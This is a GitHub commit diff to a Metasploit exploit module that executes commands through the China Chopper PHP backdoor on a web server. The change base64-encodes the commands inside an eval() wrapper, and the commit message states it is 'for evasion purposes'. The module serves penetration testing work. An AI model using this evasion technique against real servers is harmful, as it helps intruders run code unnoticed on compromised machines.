Skip to content

Commit 46fe0c0

Browse files
committed
base64 for evasion purposes
1 parent 6c16d2a commit 46fe0c0

File tree

1 file changed

+3
-1
lines changed

1 file changed

+3
-1
lines changed

modules/exploits/multi/http/caidao_php_backdoor_exec.rb

Lines changed: 3 additions & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -5,6 +5,7 @@
55
##
66

77
require 'msf/core'
8+
require 'pry'
89

910
class Metasploit4 < Msf::Exploit::Remote
1011
Rank = ExcellentRanking
@@ -26,7 +27,7 @@ def initialize(info = {})
2627
],
2728
'Payload' =>
2829
{
29-
'BadChars' => '\x00',
30+
'BadChars' => '\x00'
3031
},
3132
'Platform' => ['php'],
3233
'Arch' => ARCH_PHP,
@@ -46,6 +47,7 @@ def initialize(info = {})
4647
end
4748

4849
def http_send_command(code)
50+
code = "eval(base64_decode(\"#{Rex::Text.encode_base64(code)}\"));"
4951
res = send_request_cgi({
5052
'method' => 'POST',
5153
'uri' => normalize_uri(target_uri.path),

0 commit comments

Comments
 (0)